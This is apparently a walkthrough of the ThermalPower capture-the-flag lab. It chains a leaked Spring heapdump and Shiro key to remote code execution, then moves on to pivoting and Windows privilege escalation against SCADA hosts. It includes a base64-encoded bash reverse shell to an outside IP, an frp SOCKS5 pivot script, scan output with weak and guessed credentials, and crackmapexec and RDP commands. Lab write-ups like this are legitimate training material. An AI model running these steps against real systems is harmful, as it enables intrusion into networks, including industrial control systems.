ThermalPower-春秋云镜

Information gathering

Directory scanning

Directory scanning turns up a heapdump (the Spring Boot Actuator heap-dump endpoint; the fscan output further down flags the same thing as poc-yaml-spring-actuator-heapdump-file). Download it and analyze it with a heap-dump analysis tool.

The heap dump contains the Shiro rememberMe key (the AES key held by the rememberMe manager). With it, a rememberMe cookie carrying a deserialization gadget can be forged and the application exploited directly.

Vulnerability exploitation

```bash
bash -c '{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny4xMDEuNjMuMTIwLzk5OTkgMD4mMQ==}|{base64,-d}|{bash,-i}'
```

The base64 decodes to `bash -i >& /dev/tcp/47.101.63.120/9999 0>&1`. The `{echo,...}|{base64,-d}|{bash,-i}` brace-expansion form keeps the executed string free of spaces and redirection characters, which matters when the gadget chain ends in Java's Runtime.exec rather than a shell.

Once the reverse shell connects, check the host's network interfaces to find the internal subnet (172.22.17.0/24 here).

Internal network reconnaissance

Then download fscan onto the host and scan its subnet:


```
./fscan -h 172.22.17.213/24

fscan version: 1.8.4
start infoscan
(icmp) Target 172.22.17.6 is alive
(icmp) Target 172.22.17.213 is alive
[*] Icmp alive hosts len is: 2
172.22.17.6:135 open
172.22.17.6:80 open
172.22.17.213:22 open
172.22.17.6:21 open
172.22.17.213:8080 open
172.22.17.6:445 open
172.22.17.6:139 open
[*] alive ports len is: 7
start vulscan
[*] NetBios 172.22.17.6 WORKGROUP\WIN-ENGINEER
[*] NetInfo
[*]172.22.17.6
   [->]WIN-ENGINEER
   [->]172.22.17.6
[*] WebTitle http://172.22.17.213:8080 code:302 len:0 title:None redirect url: http://172.22.17.213:8080/login;jsessionid=8C8C2698165BC498428345B7768228CA
[*] WebTitle http://172.22.17.213:8080/login;jsessionid=8C8C2698165BC498428345B7768228CA code:200 len:2936 title:火创能源监控画面管理平台
[+] ftp 172.22.17.6:21:anonymous
   [->]Modbus
   [->]PLC
   [->]web.config
   [->]WinCC
   [->]内部软件
   [->]火创能源内部资料
[*] WebTitle http://172.22.17.6 code:200 len:661 title:172.22.17.6 - /
[+] PocScan http://172.22.17.213:8080 poc-yaml-spring-actuator-heapdump-file
[+] PocScan http://172.22.17.213:8080 poc-yaml-springboot-env-unauth spring2
Completed 6/7 [-] ssh 172.22.17.213:22 root root_123 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
Completed 6/7 [-] ssh 172.22.17.213:22 root 000000 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
Completed 6/7 [-] ssh 172.22.17.213:22 root 2wsx@WSX ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
Completed 6/7 [-] ssh 172.22.17.213:22 admin Admin@123 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
Completed 6/7 [-] ssh 172.22.17.213:22 admin 666666 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
Completed 6/7 [-] ssh 172.22.17.213:22 admin 1qaz!QAZ ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
Completed 7/7
[*] Scan finished, elapsed: 6m36.928867719s
```

The web title 火创能源监控画面管理平台 is the Huochuang Energy monitoring-screen management platform, and the anonymous FTP share on 172.22.17.6 exposes Modbus, PLC and WinCC material plus the folders 内部软件 (internal software) and 火创能源内部资料 (Huochuang Energy internal documents). NetBIOS identifies that host as WORKGROUP\WIN-ENGINEER, a Windows machine, so it very likely also has RDP (3389), a port that fscan's default port list does not probe.

Setting up a proxy

Set up a proxy to reach the internal network from the attack box; frp is used here.
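The frp SOCKS5 pivot that step refers to, written out as an added example rather than the writeup's own configuration. It assumes frps on the attacker VPS 47.101.63.120 (the reverse-shell listener above) and frpc on the compromised Spring host 172.22.17.213; the ports, the token and the plugin user/password are illustrative values.

```shell
#!/bin/sh
# Added example (not from the original writeup): an frp SOCKS5 pivot.
# Topology assumed: frps runs on the attacker VPS 47.101.63.120; frpc runs on
# the compromised host 172.22.17.213 with frp's built-in socks5 plugin, so
# connections to 47.101.63.120:1080 leave from 172.22.17.213 into
# 172.22.17.0/24. This is the ini layout of frp 0.51 and earlier; newer
# releases take the same settings in TOML.

FRP_SERVER=${FRP_SERVER:-47.101.63.120}
FRP_PORT=${FRP_PORT:-7000}
FRP_SOCKS_PORT=${FRP_SOCKS_PORT:-1080}
FRP_TOKEN=${FRP_TOKEN:-change-me}

# write_frps_ini PATH: server side, on the VPS (./frps -c frps.ini). The token
# stops anyone who finds port 7000 from registering tunnels on your server.
write_frps_ini() {
    cat > "$1" <<EOF
[common]
bind_port = $FRP_PORT
token = $FRP_TOKEN
EOF
}

# write_frpc_ini PATH: client side, on the pivot (./frpc -c frpc.ini).
# remote_port is opened on frps, not on the pivot, so the pivot only needs an
# outbound connection to the VPS. That SOCKS port is reachable from the whole
# internet, hence plugin_user/plugin_passwd.
write_frpc_ini() {
    cat > "$1" <<EOF
[common]
server_addr = $FRP_SERVER
server_port = $FRP_PORT
token = $FRP_TOKEN

[socks5]
type = tcp
remote_port = $FRP_SOCKS_PORT
plugin = socks5
plugin_user = pivot
plugin_passwd = $FRP_TOKEN
EOF
}

# proxychains_line -> the [ProxyList] entry for /etc/proxychains4.conf on the
# attack box; tools are then run as "proxychains -q <tool>".
proxychains_line() {
    printf 'socks5 %s %s pivot %s\n' "$FRP_SERVER" "$FRP_SOCKS_PORT" "$FRP_TOKEN"
}

# Usage: sh frp_pivot.sh OUTDIR   (then copy frpc.ini and the frpc binary to the pivot)
if [ "$#" -eq 1 ]; then
    write_frps_ini "$1/frps.ini"
    write_frpc_ini "$1/frpc.ini"
    proxychains_line
fi
```

With the proxychains entry in place, the crackmapexec and xfreerdp commands later in the writeup are simply prefixed with `proxychains -q`.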

The internal web server on 172.22.17.6 (a plain directory listing) is now reachable through the proxy; go through the sensitive documents there.

The credentials chenhua / chenhua@0813 found in those documents log in successfully. Validate them (or spray a list, with the same syntax) over SMB with CrackMapExec:

```bash
proxychains -q crackmapexec smb 172.22.17.6 -u chenhua -p chenhua@0813
```

RDP command on Kali, through the proxy; `/drive:tmp,/tmp` shares the local /tmp into the session as \\tsclient\tmp:

```bash
proxychains -q xfreerdp /u:chenhua /p:chenhua@0813 /v:172.22.17.6:3389 +clipboard /drive:tmp,/tmp
```

I used Parallels Client here instead.

In the session it turns out the user is a member of the Backup Operators group, and the machine has no outbound internet access, so the only way forward is a local privilege escalation through the SeBackupPrivilege that group carries (back up the SAM and SYSTEM hives, extract the local Administrator hash offline, pass the hash). Reference:

https://github.com/k4sth4/SeBackupPrivilege

That yields the flag.

Keep going with fscan on the next segment:


```
./fscan -h 172.22.26.1/24

fscan version: 1.8.4
start infoscan
(icmp) Target 172.22.26.11 is alive
[*] Icmp alive hosts len is: 1
172.22.26.11:445 open
172.22.26.11:139 open
172.22.26.11:80 open
172.22.26.11:135 open
172.22.26.11:1433 open
[*] alive ports len is: 5
start vulscan
[*] NetBios 172.22.26.11 WORKGROUP\WIN-SCADA
[+] mssql 172.22.26.11:1433:sa 123456
[*] NetInfo
[*]172.22.26.11
   [->]WIN-SCADA
   [->]172.22.26.11
[*] WebTitle http://172.22.26.11 code:200 len:703 title:IIS Windows Server
Completed 5/5
[*] Scan finished, elapsed: 4.784177011s
```

The key finding is WIN-SCADA with MSSQL on 1433 accepting sa / 123456. RDP into it.

Clicking the boiler "on" control yields a flag.

The last database is empty; it has in fact been encrypted by ransomware.

The desktop holds the encrypted files, and the key information is in the file description (properties) field. For that part, see
https://fushuling.com/index.php/2024/03/01/%E6%98%A5%E7%A7%8B%E4%BA%91%E5%A2%83-thermalpower/